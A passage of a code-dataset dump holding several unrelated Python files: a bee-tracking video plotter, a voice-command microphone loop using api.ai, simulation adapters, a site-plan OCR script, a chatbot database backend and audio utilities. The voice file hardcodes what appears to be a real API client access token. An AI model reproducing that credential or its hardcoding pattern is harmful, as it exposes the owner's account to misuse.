self.no_rotate:\n origin = self.calculate_origin(frame_obj)\n if is_plotting_required:\n api.transform_axis_coordinates(origin=origin)\n else:\n if origin[0] == 1:\n image = image[:, ::-1]\n if origin[1] != 0:\n image = image[::-1, :]\n else:\n # Swap the image back so that it's in the original x/y space.\n # It's done here again instead of not doing it in the beginning to\n # unify all coordinate actions for both cases.\n if not is_plotting_required:\n image = np.swapaxes(image, 1, 0)\n else:\n # The axes of the plot would need to be swapped.\n # Todo if combination of raw=False and no_rotate=True is required.\n pass\n\n outputbuffer = utils.ReusableBytesIO()\n if is_plotting_required:\n fig.savefig(outputbuffer, dpi=dpi, format='JPG')\n plt.close()\n else:\n np.save(outputbuffer, image, allow_pickle=False)\n outputbuffer.seek(0)\n\n return outputbuffer\n\n\nclass VideoPlotter(api.VideoPlotter):\n \n def __init__(self, **args):\n super(VideoPlotter, self).__init__(**args)\n\n # 'frames' can be a list of dictionaries, too.\n if len(self._frames) > 0 and isinstance(self._frames[0], dict):\n self._frames = [FramePlotter.from_dict(frame) for frame in self._frames]\n\n # First, fill in missing frames if requested.\n if self._fill_gaps:\n from .models import Frame\n\n fids = [frame.frame_id for frame in self._frames]\n i = 0\n while i < len(fids) - 1:\n fid1, fid2 = fids[i], fids[i+1]\n f1 = Frame.objects.get(frame_id=fid1)\n f2 = Frame.objects.get(frame_id=fid2)\n if f1.fc_id != f2.fc_id:\n i += 1\n continue\n if f2.index - f1.index == 1:\n i += 1\n continue\n fill_frame_ids = (\n Frame.objects.filter(\n fc_id=f1.fc_id,\n index__gt=f1.index,\n index__lt=f2.index\n ).order_by('index').values_list('frame_id', flat=True)\n )\n for fill_frame_id in reversed(fill_frame_ids): # reversed so we dont need to increment i\n fill_frame_id = int(fill_frame_id)\n fids.insert(i+1, fill_frame_id)\n # Fill data with copy of previous frame.\n filler_frame = copy.deepcopy(self._frames[i])\n filler_frame._frame_id = fill_frame_id\n self._frames.insert(i+1, filler_frame)\n i += 1 + len(fill_frame_ids)\n \n # Add frames before and after the specified frames.\n if self._n_frames_before_after:\n from .models import Frame\n for idx, offset in ((0, -self._n_frames_before_after-1), (-1, +self._n_frames_before_after+1)):\n frame_plotter = self._frames[idx]\n fid = frame_plotter.frame_id\n frame = Frame.objects.get(frame_id=fid)\n from_idx, to_idx = frame.index + offset, frame.index\n if offset > 0:\n from_idx, to_idx = to_idx, from_idx\n fill_frame_ids = (\n Frame.objects.filter(\n fc_id=frame.fc_id,\n index__gt=from_idx,\n index__lt=to_idx\n ).order_by('index').values_list('frame_id', flat=True)\n )\n if idx == 0:\n fill_frame_ids = reversed(fill_frame_ids)\n for fill_frame_id in fill_frame_ids:\n filler_frame = copy.deepcopy(frame_plotter)\n filler_frame._frame_id = fill_frame_id\n filler_frame._xs = None\n filler_frame._ys = None\n filler_frame._title = None\n self._frames.insert(idx, filler_frame)\n\n # Calculate auto-cropping.\n if self._crop_margin is not None:\n xs = np.array([x for frame in self._frames if frame._xs is not None for x in frame._xs])\n ys = np.array([y for frame in self._frames if frame._ys is not None for y in frame._ys])\n \n if len(xs) > 0 and len(ys) > 0:\n self._crop_coordinates = adjust_cropping_window(xs, ys,\n scale=1.0, padding=self._crop_margin)\n\n # Calculate tracks based on the labels.\n if self._track_labels:\n # First pass, figure out positions of labels per frame.\n for frame_idx, frame in enumerate(self._frames):\n if frame.labels is None:\n continue\n if not frame._paths:\n frame._paths = {}\n # For every label in the current frame, find the closest matching\n # label in the next frames.\n for label_idx, label in enumerate(frame.labels):\n candidates = []\n label_x, label_y = frame.xs_unscaled[label_idx], frame.ys_unscaled[label_idx]\n # Need to start a new path?\n current_path = (math.inf, [[label_x, label_y]])\n if label in frame._paths:\n current_path = frame._paths[label]\n \n for next_frame_idx in range(frame_idx + 1, len(self._frames)):\n next_frame = self._frames[next_frame_idx]\n if next_frame.labels is None:\n continue\n frame_distance = next_frame_idx - frame_idx\n\n # Figure out index of label(-candidates) in next frame.\n for other_label_idx, other_label in enumerate(next_frame.labels):\n if other_label == label:\n x, y = next_frame.xs_unscaled[other_label_idx], next_frame.ys_unscaled[other_label_idx]\n distance = math.sqrt((label_x - x) ** 2.0 + (label_y - y) ** 2.0)\n # Allow only a sensible distance to prevent lines from jumping.\n # Per-frame movement limit.\n if distance > (frame_distance * 75.0):\n continue\n # Total gap length before a new path is started.\n if distance > 300.0:\n continue\n candidates.append((distance, next_frame_idx, (x, y)))\n if candidates:\n break\n if not candidates:\n continue\n # Now remember the line for the nearest next label.\n distance, next_frame_idx, (x, y) = sorted(candidates)[0]\n # And interpolate all frames in between.\n interpolation_per_frame = 1.0 / float(next_frame_idx - frame_idx)\n for f, interpolation_frame_idx in enumerate(range(frame_idx + 1, next_frame_idx + 1)):\n next_frame = self._frames[interpolation_frame_idx]\n interpolation = (f + 1) * interpolation_per_frame\n _x = label_x + (x - label_x) * interpolation\n _y = label_y + (y - label_y) * interpolation\n\n if not next_frame._paths:\n next_frame._paths = {}\n # Check if better path was found.\n if label in next_frame._paths:\n if distance >= next_frame._paths[label][0]:\n break\n new_path = (distance, current_path[1] + [[_x, _y]])\n next_frame._paths[label] = new_path\n current_path = new_path\n\n # Some options can be set for all frames through the video options.\n for property in (\"_crop_coordinates\", \"_scale\", \"_path_alpha\"):\n value = getattr(self, property)\n if value is not None:\n for frame in self._frames:\n if getattr(frame, property) is None:\n setattr(frame, property, value)\n\n # If a title prefix is specified, update the frames.\n if self._title and len(self._frames) > 0:\n import datetime\n prefix = self._title\n \n if prefix == \"auto\":\n # Figure out the cam ID - assume that all frames come from the same cam.\n frame = Frame.objects.get(frame_id=self._frames[0].frame_id)\n cam_id = frame.cam_id\n # The actual frame ID and datetime will be added later.\n prefix = \"{frame_idx:4d} {datetime:}\"\n # Only the cam is fixed for all frames.\n prefix += f\" cam {cam_id:2d}\"\n # Whether we need to query additional metadata for the titles.\n needs_frame_info = (\"{datetime\" in prefix)\n\n for frame_idx, frame in enumerate(self._frames):\n # Fill placeholders.\n format_args = {}\n if \"{frame_idx\" in prefix:\n format_args[\"frame_idx\"] = frame_idx\n if needs_frame_info:\n db_frame = Frame.objects.get(frame_id=frame.frame_id)\n if \"{datetime\" in prefix:\n format_args[\"datetime\"] = \\\n datetime.datetime.fromtimestamp(db_frame.timestamp).\\\n strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]\n custom_prefix = prefix\n if format_args:\n custom_prefix = custom_prefix.format(**format_args)\n\n if frame._title:\n frame._title = custom_prefix + \" \" + frame._title\n else:\n frame._title = custom_prefix\n def plot(self):\n \"\"\"\n Creates a video with information of a track\n\n Returns:\n utils.ReusableBytesIO object containing the video.\n \"\"\"\n from .models import Frame\n\n with multiprocessing.Pool(config.n_threads) as pool:\n results = []\n extracted_frames = dict()\n for plotter in self._frames:\n frame = Frame.objects.get(frame_id=plotter.frame_id)\n\n if frame.frame_id not in extracted_frames:\n extracted_frames = {**extracted_frames, **extract_frames(frame.fc, plotter.scale)}\n assert(frame.frame_id in extracted_frames)\n # Prepare non-fork-safe things.\n plotter.prepare_plotting(frame)\n\n r = pool.apply_async(\n plotter.plot,\n (extracted_frames[frame.frame_id],)\n )\n results.append(r)\n\n images = [r.get() for r in results] # wait for all\n\n with tempfile.TemporaryDirectory() as tmpdir:\n # Write buffer to disk for ffmpeg to work.\n for idx, buffer in enumerate(images):\n with open(os.path.join(tmpdir, f'{idx:04d}.jpg'), \"wb\") as file:\n shutil.copyfileobj(buffer, file)\n \n input_path = os.path.join(tmpdir, '%04d.jpg')\n video_output_path = os.path.join(tmpdir, 'video.mp4')\n framerate = self._framerate or 3\n cmd = config.ffmpeg_frames_to_video.format(input_path=input_path, output_path=video_output_path, framerate=framerate)\n print('executing: ', cmd)\n try:\n output = check_output(cmd, shell=True)\n except Exception as e:\n # What went wrong? Check image files.\n sizes = set()\n for idx in range(len(images)):\n im = Image.open(os.path.join(tmpdir, f'{idx:04d}.jpg'))\n sizes.add(im.size)\n if len(sizes) > 1:\n print(\"Warning! Mismatching image sizes: {}\".format(str(sizes)))\n else:\n print(\"Image size: {}\".format(str(sizes)))\n raise\n print('Output:', output)\n\n with open(video_output_path, \"rb\") as file:\n buf = utils.ReusableBytesIO(file.read())\n buf.seek(0)\n return buf\n","repo_name":"BioroboticsLab/beesbook_backend","sub_path":"plotter/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":31358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23410270035","text":"import sys\r\nfrom os.path import join, dirname\r\nfrom transcribe_streaming_mic import speech2Text\r\nimport pyaudio\r\nimport time\r\nimport json \r\nimport os.path\r\nimport logging\r\n\r\nTOP_DIR = os.path.join(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir), os.pardir)\r\nUTILS_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir)\r\ntry:\r\n import apiai\r\nexcept ImportError:\r\n sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\r\n import apiai\r\n\r\ntry:\r\n sys.path.insert(0, os.path.join(TOP_DIR, \"utils/logger\"))\r\n import logger as log\r\nexcept ImportError:\r\n exit()\r\n\r\ntry:\r\n sys.path.insert(0, os.path.join(TOP_DIR, \"snowboy/examples/Python3\"))\r\n import snowboydecoder as sb\r\nexcept ImportError:\r\n exit()\r\n\r\ntry:\r\n sys.path.insert(0, os.path.join(TOP_DIR, \"utils/JSON\"))\r\n import json_utils\r\nexcept ImportError:\r\n exit()\r\n\r\nstate = \"Sleep\"\r\nmodel = os.path.join(TOP_DIR, \"models/Hyper.pmdl\")\r\ndetector = sb.HotwordDetector(model, sensitivity=0.5)\r\ninterrupted = False\r\nCLIENT_ACCESS_TOKEN = '587dba5ac7de45b3a05b7901a04f5b2e'\r\n\r\n# Hot word detection callback (which will be run whenever user say the hot word)\r\ndef hotWordCallback():\r\n sb.play_audio_file()\r\n detector.terminate()\r\n time.sleep(0.3)\r\n global state\r\n state = \"Run\"\r\n\r\n# interrupt the hotword process loop\r\ndef signal_handler():\r\n global interrupted\r\n interrupted = True\r\n\r\n# call back to check for interrupt\r\ndef interrupt_callback():\r\n global interrupted\r\n return interrupted\r\n\r\n# hot word detection: main function\r\ndef hotWordDetect(modelPath=model):\r\n # capture SIGINT signal, e.g., Ctrl+C\r\n # signal.signal(signal.SIGINT, signal_handler)\r\n \r\n print('Listening... Press Ctrl+C to exit')\r\n # main loop\r\n detector.start(detected_callback=hotWordCallback,\r\n interrupt_check=interrupt_callback,\r\n sleep_time=0.03)\r\n\r\n# apiai for Natural language understanding\r\ndef apiaiPGetResponse(transcript):\r\n ai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)\r\n\r\n request = ai.text_request()\r\n request.lang = 'en' # optional, default value equal 'en'\r\n request.session_id = \"vulong\"\r\n request.query = transcript\r\n response = request.getresponse()\r\n\r\n return response.read()\r\n\r\n# cover 2 process: call speech to text and call NLU module\r\ndef voice2JSON():\r\n # Use Google API stream mic:\r\n transcript = speech2Text()\r\n apiaiResponse = apiaiPGetResponse(transcript)\r\n # print(apiaiResponse.decode('utf-8'))\r\n apiaiResponse = json.loads(apiaiResponse.decode('utf-8'))\r\n if apiaiResponse[\"result\"]:\r\n parsedAction = apiaiResponse[\"result\"][\"action\"]\r\n parsedActionImcomplete = apiaiResponse[\"result\"][\"actionIncomplete\"]\r\n parsedScore = apiaiResponse[\"result\"][\"score\"]\r\n parsedParameters = apiaiResponse[\"result\"][\"parameters\"]\r\n parsedSpeechScript = apiaiResponse[\"result\"][\"fulfillment\"][\"speech\"]\r\n parsedSpeechScript2 = apiaiResponse[\"result\"][\"fulfillment\"][\"messages\"][0][\"speech\"]\r\n return parsedAction, parsedActionImcomplete, parsedScore, parsedParameters, parsedSpeechScript, parsedSpeechScript2\r\n else:\r\n print(\"Null api results\")\r\n return -1, -1, -1, -1, -1, -1\r\n\r\n\r\ndef voiceProcess(log_q, mng_q, aud_q):\r\n logger = log.loggerInit(log_q)\r\n logger.log(logging.INFO, \"voiceProcess is started\")\r\n while True:\r\n global state\r\n if state == \"Sleep\":\r\n state = \"Pause\"\r\n hotWordDetect()\r\n elif state == \"Run\":\r\n logger.log(logging.INFO, \"Voice is detected\")\r\n [action, actionIncomplete, score, parameters, speechScript, speechScript2] = voice2JSON()\r\n logger.log(logging.INFO, \"Action: \" + action)\r\n logger.log(logging.DEBUG, \"actionIncomplete: \" + str(actionIncomplete))\r\n logger.log(logging.DEBUG, \"score: \" + str(score))\r\n logger.log(logging.DEBUG, \"parameters: \" + str(parameters))\r\n logger.log(logging.DEBUG, \"speechScript: \" + speechScript)\r\n logger.log(logging.DEBUG, \"speechScript2: \" + speechScript2)\r\n if (action == -1 or action == \"smalltalk.greetings.bye\"):\r\n aud_q.put(json_utils.jsonSimpleGenerate(\"speech\", speechScript))\r\n state = \"Sleep\"\r\n continue\r\n if (score < 0.5 or actionIncomplete == 'true' or not(speechScript)):\r\n try:\r\n aud_q.put_nowait(json_utils.jsonSimpleGenerate(\"speech\", \"I am not sure to understand what you mean. Can you repeat or explain more?\"))\r\n # mng_q.put_nowait(jsonSimpleGenerate(\"action\", action))\r\n continue\r\n except Exception as e:\r\n logger.log(logging.WARNING, \"Action is not complete or score is low\")\r\n state = \"Sleep\"\r\n continue\r\n else:\r\n try:\r\n # ManagerJSONQueue.put(jsonSimpleGenerate(\"action\", action))\r\n if not aud_q.full():\r\n if (speechScript and speechScript != -1):\r\n logger.log(logging.DEBUG, \"Put script to AudioQueue\")\r\n aud_q.put_nowait(json_utils.jsonSimpleGenerate(\"speech\", speechScript))\r\n if (speechScript2 and speechScript2 != -1 and speechScript != speechScript2):\r\n time.sleep(1)\r\n logger.log(logging.DEBUG, \"Put script to AudioQueue\")\r\n aud_q.put_nowait(json_utils.jsonSimpleGenerate(\"speech\", speechScript2))\r\n else:\r\n logger.log(logging.WARNING, \"Audio queue is full\")\r\n state = \"Sleep\"\r\n continue \r\n except Exception as e:\r\n logger.log(logging.WARNING, str(type(e)))\r\n state = \"Sleep\"\r\n continue\r\n elif state == \"Pause\":\r\n time.sleep(1)\r\n","repo_name":"lovung/HyperNode-VoiceCommander","sub_path":"utils/audio/microphone.py","file_name":"microphone.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34684000854","text":"from smarts_imitation.utils import common\nimport gym\n\n\ndef get_observation_adapter(feature_list, closest_neighbor_num):\n img_resolution = 40\n observe_lane_num = 3\n\n observation_space = gym.spaces.Dict(\n common.subscribe_features(\n feature_list, closest_neighbor_num=closest_neighbor_num\n )\n )\n\n observation_adapter = common.get_observation_adapter(\n observation_space,\n observe_lane_num=observe_lane_num,\n resize=(img_resolution, img_resolution),\n closest_neighbor_num=closest_neighbor_num,\n )\n\n return observation_adapter\n\n\ndef get_action_adapter():\n def action_adapter(model_action):\n assert len(model_action) == 2\n return (model_action[0], model_action[1])\n\n return action_adapter\n","repo_name":"zbzhu99/NGSIM_Imitation","sub_path":"smarts-imitation/smarts_imitation/utils/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"12213099242","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport shutil\nimport statistics\nfrom statistics import mode\n\nfrom pdf2image import convert_from_path\nimport xlwt\nfrom xlwt import Workbook\nimport yolo\nimport pytesseract\nimport cv2\n\ntextBlocks = []\ndictImages = {}\npytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\nroi = [(0, 0), (2500, 854)]\n\n\ndef findBlockAndLot(path):\n image = cv2.imread(path)\n x, y = roi[0]\n w, h = roi[1]\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 9)\n imageCrop = image[x:x + h, y:y + w]\n\n tesData = f\"{pytesseract.image_to_string(imageCrop)}\"\n lot = ''\n block = ''\n\n if (tesData.__contains__(\"BLOCK\")):\n findBlocks = re.split('BLOCK', tesData)\n splitData = re.split(',| |\\n', findBlocks[1])\n if (splitData[0] == ''):\n block = splitData[1]\n else:\n block = splitData[0]\n else:\n tesData1 = f\"{pytesseract.image_to_string(image)}\"\n\n if (tesData1.__contains__(\"BLOCK\")):\n findBlocks = re.split('BLOCK', tesData1)\n\n bno = []\n\n for i in range(1, len(findBlocks)):\n splitData = re.split(',| |\\n', findBlocks[i])\n if (splitData[0] == ''):\n lot = splitData[1]\n else:\n lot = splitData[0]\n bno.append(lot)\n\n block = mode(bno)\n\n if (tesData.__contains__(\"LOT\")):\n\n pos = -1\n if (tesData.__contains__(\"LOTS\")):\n findBlocks = re.split('LOTS', tesData)\n else:\n findBlocks = re.split('LOT', tesData)\n\n splitData = re.split(',| |\\n', findBlocks[1])\n\n if (splitData[0] == ''):\n lot = splitData[1]\n else:\n lot = splitData[0]\n\n # lot = lot.replace(\"I\", \"1\")\n # lot = lot.replace(\"!\", \"1\")\n # lot = lot.replace(\"S\", \"5\")\n\n if lot == '' or lot[0].isdigit() == False:\n print(\"lot not found, trying yolo\")\n lots = yolo.fetchLotFromYolo(path)\n if (len(lots) > 1):\n lot = lots[0] + \"-\" + lots[-1]\n else:\n lot = lots[0]\n\n else:\n print(\"lot not found, trying yolo\")\n lots = yolo.fetchLotFromYolo(path)\n if (len(lots) > 1):\n lot = lots[0] + \"-\" + lots[-1]\n else:\n lot = lots[0]\n\n disallowed_characters = \"._!\"\n for character in disallowed_characters:\n lot = lot.replace(character, \"\")\n block = block.replace(character, \"\")\n\n lot = lot.replace(\"I\", \"1\")\n lot = lot.replace(\"!\", \"1\")\n lot = lot.replace(\"S\", \"5\")\n block = block.replace(\"I\", \"1\")\n block = block.replace(\"!\", \"1\")\n block = block.replace(\"S\", \"5\")\n\n lotFound = False\n blockFound = False\n if lot != \"\":\n lotFound = True\n if block != \"\":\n blockFound = True\n\n json = {\"lot\": lot, \"lotFound\": lotFound, \"block\": block, \"blockFound\": blockFound, }\n print(json)\n return json\n\n\n\n\n\n\n\ndirectory = os.listdir(\"Pdf2Img\")\nwb = Workbook()\nsheet1 = wb.add_sheet('Sheet 1')\nfor i in range(len(directory)):\n f = os.path.join(\"Pdf2Img/\", directory[i])\n if os.path.isfile(f):\n print(f,i)\n resjson = findBlockAndLot(f)\n\n sheet1.write(i, 0, f)\n sheet1.write(i, 1, str(resjson))\n\n wb.save('abc.xls')\n\n\n# findBlockAndLot(directory)\n\n\n\n# def pdf2img(pdfpath):\n# print(pdfpath)\n# pages = convert_from_path(pdfpath, 800, poppler_path=r\"C:\\Users\\VRA\\Downloads\\poppler-0.68.0\\bin\", size=7680)\n# save_path = r'SitePlanImages'\n# if os.path.exists(save_path):\n# shutil.rmtree(save_path)\n# os.mkdir(save_path)\n# for i in range(len(pages)):\n# pages[i].save(save_path + '\\\\' + str(i) + '.jpg', 'JPEG')\n# resjson = findBlockAndLot(save_path + '\\\\' + str(i) + '.jpg')\n#\n# wb = Workbook()\n# sheet1 = wb.add_sheet('Sheet 1')\n#\n# sheet1.write(i, 0, pdfpath.split(\"/\")[-1])\n# sheet1.write(0, i, resjson)\n#\n# wb.save('xlwt example.xls')\n#\n#\n# pdfPath = \"Abbott Square Individual Site Plans/245282000912 5860 Newberry Pines Avenue Site Plan.pdf\"\n# pdf2img(pdfPath)\n","repo_name":"BhuvanaVra/SitePlan-Developments","sub_path":"sitePlan.py","file_name":"sitePlan.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33484249965","text":"# Chatbot Backend\n\nimport os\nimport threading\nfrom copy import deepcopy\nfrom decimal import Decimal\nfrom datetime import datetime\n\nfrom cbsv import read_json, dump_to_json, check_file_exists, CHINA_CITIES\nfrom cb_sql import MSSQL_readwriter\n\n\ndbfolder = \"userdata\"\nSUPER_DEBUG = 0\nDEBUG = 0\nREAD_FROM_JSON = 1\nWRITE_TO_JSON = 1\n\nclass DatabaseRunner():\n def __init__(self):\n self.backup_delay = 30\n self.timer_on = False\n \n if READ_FROM_JSON:\n self.database = self._read_json_db()\n else:\n self.database = {}\n\n self.SQLrw = MSSQL_readwriter()\n\n def _read_json_db(self):\n def _create_json_db():\n if not check_file_exists(self.dbfilepath):\n print(\"Creating empty database file\")\n dump_to_json(self.dbfilepath,{}, OVERRIDE = 1) # Create an empty file\n return\n\n base_directry = os.getcwd()\n dbfilename = \"database.json\"\n # self.dbfilepath = os.path.join(base_directry,dbfolder,dbfilename)\n self.dbfilepath = os.path.join(base_directry,dbfilename) # For testing purpose\n _create_json_db()\n\n if DEBUG: print(\"Loading info from\", self.dbfilepath)\n return read_json(self.dbfilepath)\n\n # Assuming there is a match\n def repackage_sql_fetched(self, dbf, status):\n # Database dates are datetimes. Incompatible with Json.\n def datetime_obj_to_str(dateobj):\n if isinstance(dateobj, datetime):\n return str(dateobj)\n return dateobj\n\n # Database values are Decimals. Incompatible with Json.\n def decimal_obj_to_float(dobj):\n if isinstance(dobj, Decimal):\n return float(dobj)\n return dobj\n\n def convert_object_to_values(obj):\n if isinstance(obj, dict):\n return convert_object_to_values(obj)\n if isinstance(obj, list):\n return obj\n obj = decimal_obj_to_float(obj)\n obj = datetime_obj_to_str(obj)\n return obj\n\n def convert_dict_values(raw_d):\n pro_d = {}\n for k, v in raw_d.items():\n pro_d[k] = convert_object_to_values(v)\n return pro_d\n\n # Removes the ones with bad cust city\n def filter_inpure_exist_entries(d):\n basic_dict = d.get(\"basic\")\n\n out = {}\n except_flag = False\n exceptional_k = \"exceptional_case\"\n secondary_k = \"secondary_shebao\"\n deciding_key = \"cust_city\"\n # Because cust_city is filled with other junk and we are only interested in real cities\n valid_vals = CHINA_CITIES() \n \n extra_count = 0\n basic_dict_list = list(basic_dict.values())\n for ed_entry in basic_dict_list:\n deciding_entry_val = ed_entry.get(deciding_key,\"\")\n for v in valid_vals:\n if v in deciding_entry_val:\n print(\"<FILTER> basic dict entry: \", ed_entry, \"DV:\",deciding_entry_val)\n if out == {}:\n out.update(ed_entry)\n break\n else:\n extra_count += 1\n extra_k = secondary_k + str(extra_count)\n out[extra_k] = ed_entry\n except_flag = True\n break\n \n out[exceptional_k] = \"yes\" if except_flag else \"no\"\n\n return out\n def billing_to_list(d):\n def _repackage(bd):\n outlist = [] \n bd_itemlist = list(bd.items())\n for realname, details in bd_itemlist:\n ramt_due = details.get(\"curr_month_amt_due\",\"\")\n amt_due = convert_object_to_values(ramt_due)\n l_entry = (realname, amt_due)\n outlist.append(l_entry)\n return outlist\n\n bill_d = d.get(\"bill_info\")\n return _repackage(bill_d)\n\n # Swaps and converts values\n def repackage_base_details(d):\n mod = {}\n default_details = {\"首次\":\"no\"} # Values assigned by default\n mod.update(default_details)\n \n modlist = {\n \"curr_payment_status\":{\n \"writeto\":\"curr_payment_status\",\n \"swaps\":[\n (\"正常缴费\", \"normal\"),\n (\"新进\", \"normal\"),\n (\"新进补缴\", \"normal\")\n ]\n },\n \"cust_city\":{\n \"writeto\":\"city\",\n \"swaps\":[(\"苏州\",\"苏州\"),(\"上海\",\"上海\")]\n },\n \"shebao_jishu\":{\n \"writeto\":\"要社保\",\n \"if_present\": \"yes\",\n \"if_none\": \"no\",\n \"swaps\":[(\"\", \"no\")]\n },\n \"gjj_jishu\":{\n \"writeto\":\"要公积金\",\n \"if_present\": \"yes\",\n \"if_none\": \"no\",\n \"swaps\":[(\"\", \"no\")]\n }\n }\n\n for d_name, val in d.items():\n if SUPER_DEBUG: print(\"<MOD DB FETCH> Mod\",mod,\" + \", d_name)\n if d_name in modlist: \n curr_mod = modlist[d_name]\n new_key = curr_mod[\"writeto\"]\n ip_flag = curr_mod.get(\"if_present\",False)\n none_val = curr_mod.get(\"if_none\",\"\")\n if val is None:\n mod[d_name] = none_val\n continue\n \n if ip_flag:\n raw_value = curr_mod[\"if_present\"]\n if curr_mod.get(\"keep_og\", True):\n mod[d_name] = val\n else:\n raw_value = val\n\n # Check if comparison is possible\n if isinstance(val, float) or isinstance(val, int):\n outval = raw_value\n else:\n # Check against table and swap values\n for regex, swapped_output in curr_mod.get(\"swaps\",[]):\n if regex in val:\n outval = swapped_output\n else: \n outval = raw_value\n \n mod[new_key] = outval\n else:\n mod[d_name] = val\n if SUPER_DEBUG: print(\"<MODIFIED FETCH>\", mod)\n return mod\n\n def attach_status(d, status):\n # Returns a string the represents the status of the customer\n def judge_status(d, status):\n exist, bill = status\n pay_status_key = \"curr_payment_status\"\n valid_status = [\"正常缴费\", \"新进\", \"新进补缴\"]\n pay_status = d.get(pay_status_key, \"\")\n\n if pay_status in valid_status:\n s1 = \"Active\"\n else:\n s1 = \"Inactive\"\n \n if bill:\n s2 = \"Bill\"\n else:\n s2 = \"NoBill\"\n\n out_str = s1 + \"_\" + s2\n return out_str\n \n status_tup = judge_status(d, status)\n d[\"customer_status\"] = status_tup \n \n rbase = filter_inpure_exist_entries(dbf)\n bill_list = billing_to_list(dbf)\n base = convert_dict_values(rbase)\n final = repackage_base_details(base)\n final[\"bills\"] = bill_list\n attach_status(final,status)\n\n return final\n\n # Returns a tuple of (Bool, Dict)\n def fetch_user_info(self, user):\n BLANK_ENTRY = {}\n def _fetch_from_JSON(user):\n # self.database reflects the entire json database\n if not user in self.database:\n # Create empty entry for new user\n self.database[user] = BLANK_ENTRY\n return\n\n def _fetch_from_SQL(user):\n status, fetch = self.SQLrw.fetch_user_info_from_sqltable(user)\n found = status[0] # (exists, has bill)\n if found:\n ndic = self.repackage_sql_fetched(fetch, status)\n self.database[user] = ndic\n else:\n _fetch_from_JSON(user)\n\n return found\n\n found_in_sql = _fetch_from_SQL(user)\n return (found_in_sql, self.database[user])\n\n def trigger_backup(self):\n if self.timer_on:\n return\n self.timer_on = True\n backuptimer = threading.Timer(self.backup_delay, self._true_write_to_db)\n backuptimer.start()\n\n def write_to_db(self, chatid, info):\n if not chatid in self.database:\n # Create empty entry for new user\n self.database[chatid] = {}\n\n # Write to a dict that will later be pushed to the db\n self.database[chatid].update({\"userID\":chatid})\n self.database[chatid].update(info)\n if DEBUG: print(\"<Write to DB> self.db\", self.database)\n\n # Set timer to write\n self.trigger_backup()\n\n def _true_write_to_db(self):\n def destroy_local_empty_records():\n for user in list(self.database.keys()):\n if self.database[user] == {}:\n self.database.pop(user)\n\n if DEBUG: print(\"Writing userinfo to database\")\n destroy_local_empty_records()\n if WRITE_TO_JSON:\n dump_to_json(self.dbfilepath, self.database)\n else:\n self.SQLrw.write_to_sqltable(self.database)\n self.timer_on = False\n\n# Assumes messages are in a list structure\ndef record_chatlog_to_json(chatID, chatlog):\n direct = os.getcwd()\n log_folder = \"chatlogs\"\n if not os.path.isdir(os.path.join(direct,log_folder)):\n print(\"Creating chatlogs folder...\")\n os.mkdir(os.path.join(direct,\"chatlogs\")) # If no folder, make a folder\n \n log_filepath = os.path.join(direct,\"chatlogs/\" + chatID + \".json\")\n \n if os.path.isfile(log_filepath):\n towrite = read_json(log_filepath)\n loglen = len(towrite)\n if DEBUG: print(\"<RECORD CHATLOG> Existing chatlog for {}: {} lines\".format(chatID,loglen))\n else:\n towrite = []\n\n towrite.extend(chatlog)\n loglen = len(towrite)\n if DEBUG: print(\"<RECORD CHATLOG> Final write: {} lines\".format(loglen))\n\n # Write to json file\n dump_to_json(log_filepath,towrite,DEBUG=0,OVERRIDE=1)\n return","repo_name":"xcalibersword/chatbot","sub_path":"chatbot_be.py","file_name":"chatbot_be.py","file_ext":"py","file_size_in_byte":10799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13631030516","text":"import numpy as np\nfrom scipy import signal\nfrom scipy.fftpack import hilbert\nfrom scipy.io import wavfile\n\n\ndef load_file(filename):\n fs, x = wavfile.read(filename)\n return x, fs\n\n\ndef get_location(segment, location='centre'):\n if location == 'centre':\n return int(segment.spec.shape[1] / 2)\n elif location == 'start':\n return 0\n elif location == 'end':\n return segment.spec.shape[1] - 1\n elif location == 'max':\n index = np.argmax(segment.spec)\n return index // segment.spec.shape[0]\n elif location == 'max_amp':\n index = np.argmax(segment.data)\n value = int(index * segment.spec.shape[1] / len(segment.data))\n return value\n return None\n\n\ndef to_db(x, reference=1.0):\n return 20 * np.log10(x / reference)\n\n\ndef apply_threshold(value, threshold=-20):\n return value * np.power(10, threshold / 10.0)\n\n\ndef geometric_mean(data):\n g_mean = 0.0\n for i in range(len(data)):\n if data[i] == 0.0:\n continue\n else:\n g_mean += np.log(data[i])\n\n g_mean /= len(data)\n g_mean = np.exp(g_mean)\n\n return g_mean\n\n\ndef energy(data):\n return np.sum(np.square(data))\n\n\"\"\"Envelopes\"\"\"\n\n\ndef three_step_envelope(data, chunk_len=20, filter_order=4, cutoff_frequency=0.1):\n y = abs(data)\n\n n = len(y)\n k = int(n / chunk_len)\n z = []\n\n for i in range(k):\n z += [np.max(y[i * chunk_len: (i + 1) * chunk_len - 1]) for j in range(chunk_len)]\n if n % chunk_len != 0:\n z += [np.max(y[(k - 1) * chunk_len: -1]) for j in range(n % chunk_len)]\n z = np.array(z)\n\n b, a = signal.butter(filter_order, cutoff_frequency, 'low')\n w = signal.filtfilt(b, a, z)\n\n return w\n\n\ndef hilbert_envelope(data):\n h_data = hilbert(data)\n return np.sqrt(np.square(data) + np.square(h_data))\n\n\n\"\"\"Spectrogram filters\"\"\"\n\n\ndef apply_mean_filter(data):\n result = []\n for i in range(data.shape[0]):\n result.append([])\n for j in range(data.shape[1]):\n result[i].append(get_mean(data, i, j))\n return 